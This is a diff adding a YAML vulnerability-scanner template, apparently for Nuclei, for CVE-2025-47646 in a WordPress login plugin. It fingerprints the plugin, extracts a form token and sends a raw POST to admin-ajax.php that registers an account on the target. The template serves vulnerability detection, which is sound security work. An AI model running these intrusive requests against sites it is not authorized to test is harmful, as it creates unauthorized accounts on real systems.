|
| 1 | +id: CVE-2025-47646 |
| 2 | + |
| 3 | +info: |
| 4 | + name: PSW Front-end Login & Registration 1.13 - Weak Password Recovery |
| 5 | + author: pussycat0x |
| 6 | + severity: critical |
| 7 | + description: | |
| 8 | + PSW Front-end Login & Registration plugin for WordPress contains a weak password recovery mechanism that can be exploited by unauthenticated attackers. This vulnerability affects versions through 1.13 and allows attackers to potentially gain unauthorized access. |
| 9 | + reference: |
| 10 | + - https://github.com/RootHarpy/CVE-2025-47646 |
| 11 | + - https://github.com/Nxploited/CVE-2025-47646 |
| 12 | + - https://patchstack.com/database/wordpress/plugin/psw-login-and-registration/vulnerability/wordpress-psw-front-end-login-registration-1-12-broken-authentication-vulnerability?_s_id=cve |
| 13 | + - https://github.com/PuddinCat/GithubRepoSpider |
| 14 | + - https://github.com/nomi-sec/PoC-in-GitHub |
| 15 | + classification: |
| 16 | + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 17 | + cvss-score: 9.8 |
| 18 | + cve-id: CVE-2025-47646 |
| 19 | + cwe-id: CWE-640 |
| 20 | + epss-score: 0.00019 |
| 21 | + epss-percentile: 0.03401 |
| 22 | + tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive |
| 23 | + |
| 24 | +variables: |
| 25 | + username: "{{randstr}}" |
| 26 | + password: "{{randstr}}" |
| 27 | + email: "{{randstr}}@{{rand_base(5)}}.com" |
| 28 | + |
| 29 | +flow: http(1) && http(2) |
| 30 | + |
| 31 | +http: |
| 32 | + - raw: |
| 33 | + - | |
| 34 | + GET /wp-login.php HTTP/1.1 |
| 35 | + Host: {{Hostname}} |
| 36 | +
|
| 37 | + redirects: true |
| 38 | + matchers: |
| 39 | + - type: word |
| 40 | + part: body |
| 41 | + words: |
| 42 | + - "psw_registration" |
| 43 | + - "pswlogform" |
| 44 | + - "/wp-content/plugins/psw-login-and-registration" |
| 45 | + condition: and |
| 46 | + internal: true |
| 47 | + |
| 48 | + extractors: |
| 49 | + - type: regex |
| 50 | + name: token |
| 51 | + group: 1 |
| 52 | + regex: |
| 53 | + - 'name="pswforgetform" value="(.*?)"' |
| 54 | + internal: true |
| 55 | + |
| 56 | + - raw: |
| 57 | + - | |
| 58 | + POST /wp-admin/admin-ajax.php HTTP/1.1 |
| 59 | + Host: {{Hostname}} |
| 60 | + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |
| 61 | + X-Requested-With: XMLHttpRequest |
| 62 | + Origin: {{RootURL}} |
| 63 | + Referer: {{RootURL}} |
| 64 | +
|
| 65 | + first_name={{username}}&last_name={{username}}&new_user_name={{username}}&new_user_email={{email}}&new_user_password={{password}}&new_user_password_confirmation={{password}}&action=register_user_front_end&psw_form={{token}} |
| 66 | +
|
| 67 | + matchers: |
| 68 | + - type: dsl |
| 69 | + dsl: |
| 70 | + - 'contains_all(body, "{{username}}","activation link")' |
| 71 | + - 'status_code == 200' |
| 72 | + condition: and |
0 commit comments